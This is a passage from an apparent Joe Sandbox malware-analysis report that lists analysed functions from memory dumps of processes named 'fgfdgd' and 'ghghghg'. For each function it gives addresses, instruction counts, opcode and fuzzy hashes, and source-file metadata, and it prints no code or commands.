                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1dffa07572fc6596f2cfc877a76258090cdda0ae838acb0aae1d4e5e5670fb65
                                        • Instruction ID: 3fe90a048b968e8fd036bd631c354247d35287333c48ada4e0f5542addc3b73a
                                        • Opcode Fuzzy Hash: 1dffa07572fc6596f2cfc877a76258090cdda0ae838acb0aae1d4e5e5670fb65
                                        • Instruction Fuzzy Hash: 03215A31A4E9084FE769DA1DD8075B473E0FF54339F0001FAD85EC3972DA29A86A8787
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18732AA7 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1cbfe396afa8dbc8ed15cc9f49ea40f8004ef202a0b09a8a3fbf95a59b88fa98
                                        • Instruction ID: e75afb3c5372ed05baa8609ed46646a0424c943a5570114d1227f5decfa0f6db
                                        • Opcode Fuzzy Hash: 1cbfe396afa8dbc8ed15cc9f49ea40f8004ef202a0b09a8a3fbf95a59b88fa98
                                        • Instruction Fuzzy Hash: EE21BB30648C088FDF89FB18C09CE6537E1EBB930571041A9D80ACB6BADE24ED94CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18730BDC Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8faf9afc3c301da65400675163f703d96fe4c941edea408ac75ebcf241b8914
                                        • Instruction ID: 0c153fffa39c2bcfa4368baa1cf7d801ec7a9bb65aa10487f18d35a75df91422
                                        • Opcode Fuzzy Hash: d8faf9afc3c301da65400675163f703d96fe4c941edea408ac75ebcf241b8914
                                        • Instruction Fuzzy Hash: C821F471A4ED4C8FDBA9DA1C94456F8B7D0EFA8321F0002FAD44DC7972DE28AD194786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE1873204A Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9c35252aad3e45d2ca37d8e23cd6cc132b7f9c5a784bc9d49f6392436361f14
                                        • Instruction ID: 86d25e8a3c9936b3150276d03cdfa7e9b0e0453239cc29c0e501f0237a554411
                                        • Opcode Fuzzy Hash: f9c35252aad3e45d2ca37d8e23cd6cc132b7f9c5a784bc9d49f6392436361f14
                                        • Instruction Fuzzy Hash: 6D113031A08A188FDB58DB1CD445AA9B3E1FB59321F0042ABE04DD3662DB31AC428B44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18730C25 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36f9eb3e3c6e12615337cebd00f65173e8c12410bc466946f4a09b8363733a6c
                                        • Instruction ID: 825fc3779bcc96411df81efc8420d57f2007f8c9b500cfc25ddafefb45ed203f
                                        • Opcode Fuzzy Hash: 36f9eb3e3c6e12615337cebd00f65173e8c12410bc466946f4a09b8363733a6c
                                        • Instruction Fuzzy Hash: DF01D271B0D9484FD798DA1C94166B8B7D0EF98321B0002BFE44EC3972DE25A9154746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187328D1 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94bc12787b33f6ad66f759b9b58693911669519f5ce7924cd9c37d3e403291f8
                                        • Instruction ID: 02de814a426658997b78aad1cee7355f71920744dc934a56d042bcccf87b2834
                                        • Opcode Fuzzy Hash: 94bc12787b33f6ad66f759b9b58693911669519f5ce7924cd9c37d3e403291f8
                                        • Instruction Fuzzy Hash: 9A019231208818CFDB89FF18C098E6177A2EBB93057554159D40ACB669DF35ECA4CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE1873286C Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5faf1d5fb3fb2d8278ff45dc932f0e5eb8e56c53b58092e23689dbb82e7274ef
                                        • Instruction ID: b0e911a5c46a0a7ad82cd723013c5462a26fe11cc0a7e1d022a45b45ed12992b
                                        • Opcode Fuzzy Hash: 5faf1d5fb3fb2d8278ff45dc932f0e5eb8e56c53b58092e23689dbb82e7274ef
                                        • Instruction Fuzzy Hash: BC011D312088088FDF49FF18C499DA577E2EF793057144199D80ACB2A6DE24ED94CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18732946 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e75f0419a311ede8ebca82ae3f84393a13a8442cf75c0d030b42ae0a3786f20
                                        • Instruction ID: bfbfe77bd7e6abb9d9c1d432bf4833598f53018a6557a9263690671f4a52e41c
                                        • Opcode Fuzzy Hash: 6e75f0419a311ede8ebca82ae3f84393a13a8442cf75c0d030b42ae0a3786f20
                                        • Instruction Fuzzy Hash: 53F09231209C088FDB89FB18C098E6173A2EBB9305B154169D50AC76B5DE24E995CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18731629 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b2942923f50c5522cc470717b57fef18fec4b6725d62bb8247ca0dd8a0ebd64
                                        • Instruction ID: fb5dd4598e0b2192c78c6aada2a7702313274c73c6f09409e54c51d826042dcb
                                        • Opcode Fuzzy Hash: 2b2942923f50c5522cc470717b57fef18fec4b6725d62bb8247ca0dd8a0ebd64
                                        • Instruction Fuzzy Hash: 7EF04F70908D5DCFDF88EB88C4A4AA8B7B1FB68310F1001A9C40DE7295CE349984CB21
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187327F1 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dce76e56393c336bbc059f2c20f96bcbf06ae45d84f57541cdba3ee92d41779f
                                        • Instruction ID: 052f38e5a03379c4d083bad69baf6f8e5885e8c7484fe66508b56aa46a641c42
                                        • Opcode Fuzzy Hash: dce76e56393c336bbc059f2c20f96bcbf06ae45d84f57541cdba3ee92d41779f
                                        • Instruction Fuzzy Hash: 49E01231359C0C8FEB89FB2C8058EB837E2DBB935175540A6D40AC73B6DD24ED468752
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18731917 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d870362d3a76b67f1e095d15d3f48469e452a920cf9f7460acf4723fef5a1567
                                        • Instruction ID: 5508e9a939e5665b1abb5e0c63eb6d3d26e8ae6de44a3f71498abfcd894c4d80
                                        • Opcode Fuzzy Hash: d870362d3a76b67f1e095d15d3f48469e452a920cf9f7460acf4723fef5a1567
                                        • Instruction Fuzzy Hash: 5EF0A530A1481C8FCF98EA18D894BA8B3B1EBA9311F14419AD40EE3265CA759DC1CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187310DD Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 45088801f3c62a4e2394fc285ea40e63e5bafbcf59a0e74dbacfcff716e72cc4
                                        • Instruction ID: 0f9dacf6c4588f4243b0deee54fa8429a95ef89e6d8e36d32c8eb6125d4226bf
                                        • Opcode Fuzzy Hash: 45088801f3c62a4e2394fc285ea40e63e5bafbcf59a0e74dbacfcff716e72cc4
                                        • Instruction Fuzzy Hash: 28E08606ECEC6B47F6A5501A30151BC13C09B68B30B9400B5EC1DC71D1DC491E95129A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187337D9 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 931e4bbda3799fed56fafa403845709c63d8513750074e10cfe72fa965906773
                                        • Instruction ID: a6ca0dc3b046491bbeb226731c0d0d60361c8b223f18773069b52fb181ce6d78
                                        • Opcode Fuzzy Hash: 931e4bbda3799fed56fafa403845709c63d8513750074e10cfe72fa965906773
                                        • Instruction Fuzzy Hash: 7BE08C2261D8148EE744F618A459AA0B3C1EF6923070901AAD80AC71B2ED1A9891C782
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18731110 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e12fa6df477ab76bdd57f0f2844b82e608c53638ab997d2375663b379ebe20e1
                                        • Instruction ID: dff9f018bb392a1358e6949c15b7861984b98ed61aa9c219df243911ac283a7e
                                        • Opcode Fuzzy Hash: e12fa6df477ab76bdd57f0f2844b82e608c53638ab997d2375663b379ebe20e1
                                        • Instruction Fuzzy Hash: 13E0C231958C094FCF58F669E088DA173E0DB68300701409AD81AC72A9DD24DC80CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187310FD Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2dd461e9e18f5c902665f36fd3871c8d46b7beb584700909664b998631f7b95
                                        • Instruction ID: 73d98b0bb2a0ae1bfbf7bc8a8f67db91490ce1474c4caa527cb2e40b340a69d8
                                        • Opcode Fuzzy Hash: d2dd461e9e18f5c902665f36fd3871c8d46b7beb584700909664b998631f7b95
                                        • Instruction Fuzzy Hash: 35E02B21C9CA854FDB919721E095DE53760DF69300B5200DAD009CB5F3EA29DD45C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18732DAB Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7af97ecf89d239340ce06a2ecb8be7ce46cc84663d4aca6e4bb24ddd3e8d1c00
                                        • Instruction ID: 4352e70a182fd8661805c33558a3710e4d6113da0629dd48481d6a9d91699bf7
                                        • Opcode Fuzzy Hash: 7af97ecf89d239340ce06a2ecb8be7ce46cc84663d4aca6e4bb24ddd3e8d1c00
                                        • Instruction Fuzzy Hash: C6D09E31714C0C8FDF85FB18C458E6573D1EBA83057514065940DC72A5DE24DD95CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18732D8A Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84a2df178fef6c513c242229dae4a4ce6bdd7f6b4bf32b325bed136a4f730969
                                        • Instruction ID: a4ad0b08ac7a87b873b066055b34d2dea8bb4bcedc92471060d242c4ec9a9659
                                        • Opcode Fuzzy Hash: 84a2df178fef6c513c242229dae4a4ce6bdd7f6b4bf32b325bed136a4f730969
                                        • Instruction Fuzzy Hash: 62C04C11729E0D1B5194A95C385536963C3D79C4517C456BB951EC335ADC545C470B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE1873198B Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c8d56d886419214b41886ba9998489e490587193816595794776df6acc4a7d6
                                        • Instruction ID: 2dd57b90010dcba1775d5c10405d9a12ac1913060b476300bd993781e1f33666
                                        • Opcode Fuzzy Hash: 5c8d56d886419214b41886ba9998489e490587193816595794776df6acc4a7d6
                                        • Instruction Fuzzy Hash: 12D0C235C5ED8DC6EB109B1094010FC7B30FF60310F1001F5FC0D42091CA646B2C524B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE187310C3 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction ID: 7aba1b5c7115666e8c7865460b91c3a4306c11cd80ae951fd7b942464fb4a397
                                        • Opcode Fuzzy Hash: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction Fuzzy Hash: BBC08011ECFD174BFB94509570020FC73709F19330B4420B9D81FC5192DC4D19954657
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FF6F13A1140 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000029.00000002.2914096186.00007FF6F13A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6F13A0000, based on PE: true
                                        • Associated: 00000029.00000002.2914062666.00007FF6F13A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000029.00000002.2914139412.00007FF6F13A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000029.00000002.2914172362.00007FF6F13A9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000029.00000002.2914208289.00007FF6F13AA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000029.00000002.2914455151.00007FF6F1617000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000029.00000002.2914485541.00007FF6F161D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000029.00000002.2915045814.00007FF6F1893000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000029.00000002.2915063553.00007FF6F1895000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_41_2_7ff6f13a0000_ghghghg.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction ID: e2bcbcc8cb3651f6a4f0dbcf8eb1252b22efa59123c1b377653db24aa76409e5
                                        • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction Fuzzy Hash: EAB0123FD1430986EB046F01D88135833606B087C0F400030C52C433D2EF7E70404B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFE18991F48 Relevance: 1.7, Strings: 1, Instructions: 472COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p]$u
                                        • API String ID: 0-4288194166
                                        • Opcode ID: 35dd2ca7d651620671ac57c80fbab12ab8fa445a5ae50f0a122c2c52b9279875
                                        • Instruction ID: a410f36f022957f61bd80a541b747e783d2074e95f44d32f139e2ce597549274
                                        • Opcode Fuzzy Hash: 35dd2ca7d651620671ac57c80fbab12ab8fa445a5ae50f0a122c2c52b9279875
                                        • Instruction Fuzzy Hash: DBE1E371D0CD498BE768D65998465B477D0FF49332F0402FDE06FC39B2EA2D6A06C689
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18991A42 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#$u
                                        • API String ID: 0-988003089
                                        • Opcode ID: 92f9e6cd4a62d72ef1a58647422edc42d488c9a95a6bc36dceec9a9bfc9d4d3e
                                        • Instruction ID: 94ae1feafe7d3acf9aff45075491e5b3b4d5b9a63fccc332d20b495171557bcc
                                        • Opcode Fuzzy Hash: 92f9e6cd4a62d72ef1a58647422edc42d488c9a95a6bc36dceec9a9bfc9d4d3e
                                        • Instruction Fuzzy Hash: 54B1A371A1CA0D8FEB58EA19D845AB973E5FF59321F1005BED04FC31B2DE29A942C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189908AA Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: i_H
                                        • API String ID: 0-1584326656
                                        • Opcode ID: 4e9d24947dd9d10456dcb04963f839f38d22e467e3d1cf54ba7bd532deefb221
                                        • Instruction ID: 5cfc5be1d72d904ae3102254f68fa0bf4d8abd9832ca366222c0177c32f57d54
                                        • Opcode Fuzzy Hash: 4e9d24947dd9d10456dcb04963f839f38d22e467e3d1cf54ba7bd532deefb221
                                        • Instruction Fuzzy Hash: 7DF01C31E1891F9EEB50DB9698415FD77F1FF4C322F5100BAC12FA21B1DA292641C794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18990B25 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1e9ca3bc87e245e452728362f9d6edcde9d8c6d4c5c84c88d521600f8d350d0
                                        • Instruction ID: e2ffa31e2a8d585b6c97dad4a35cfa92a9df470b85ad46af006352320b89ffd1
                                        • Opcode Fuzzy Hash: c1e9ca3bc87e245e452728362f9d6edcde9d8c6d4c5c84c88d521600f8d350d0
                                        • Instruction Fuzzy Hash: 5E418735E1CD098FDF98DA19C84666877E1FF88327F0002F9D06EC7572DA28A956CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18992F3F Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4af93c31bd4b7eeb473b37069d126414664a2cabd7cfc70912b5d1e4ed6ac26c
                                        • Instruction ID: 3ece60e55752e925f45daaaac9e5c7d749355d14db4ab049bf050d6dab0c8297
                                        • Opcode Fuzzy Hash: 4af93c31bd4b7eeb473b37069d126414664a2cabd7cfc70912b5d1e4ed6ac26c
                                        • Instruction Fuzzy Hash: 77413930A1DA4A4FC705EB29C440CB57BE2EFDA311F1886F9E48AC317BD929E985C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18992AA7 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06e381f2756c56f68c65cf8f9224365f8e27b03fe053061ab19fd2459620696f
                                        • Instruction ID: 4134d2f66bf7fa4e5ef124b773e8997bbb20211ecd817a6c6fcce7547c4f5fed
                                        • Opcode Fuzzy Hash: 06e381f2756c56f68c65cf8f9224365f8e27b03fe053061ab19fd2459620696f
                                        • Instruction Fuzzy Hash: DD219931648C088FDF89FB28C098E6573E2EBBD74171045A9D50ECB6B6DE24ED85CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18990BDC Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd5f87b80ed78e39387b666dbf081ff3bc6e229d00210e112ea70ff2ce131fe2
                                        • Instruction ID: 7e69a868bb6cccd2036935b5051dae051efa9de830c85f21bfc5b6cd50d1a9ce
                                        • Opcode Fuzzy Hash: cd5f87b80ed78e39387b666dbf081ff3bc6e229d00210e112ea70ff2ce131fe2
                                        • Instruction Fuzzy Hash: D921A471E0CD498FDBA8DA1C98466B877D1EF99322F0002FAD05EC7572EE28AD058785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE1899204A Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba024d0e6b3389ac20d11a5129695d11694bef20cbf7f3a74603ad3c52869a55
                                        • Instruction ID: d6e4d89490a8c0c80aceab551db0b461cd012e333ed212aa767d612cfa09afae
                                        • Opcode Fuzzy Hash: ba024d0e6b3389ac20d11a5129695d11694bef20cbf7f3a74603ad3c52869a55
                                        • Instruction Fuzzy Hash: CA111E71A18A188FDB58DF5CD845AADB7E1FF59321F1042AFE04ED3662DB31AC428B44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE18990C25 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d295cd53f7ea94ad13789ceb3ca2eb2e4cb630fff1909c1d3f186ca37ab2c9d4
                                        • Instruction ID: e5237b8db0c6bcebf7effd3115afd596fd0a989b20de77d8e308216633016985
                                        • Opcode Fuzzy Hash: d295cd53f7ea94ad13789ceb3ca2eb2e4cb630fff1909c1d3f186ca37ab2c9d4
                                        • Instruction Fuzzy Hash: 25019271B1D9484FD798DA1C94166B977D1FF89322B0002BFE05FC3972EE25A9058745
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE189928D1 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
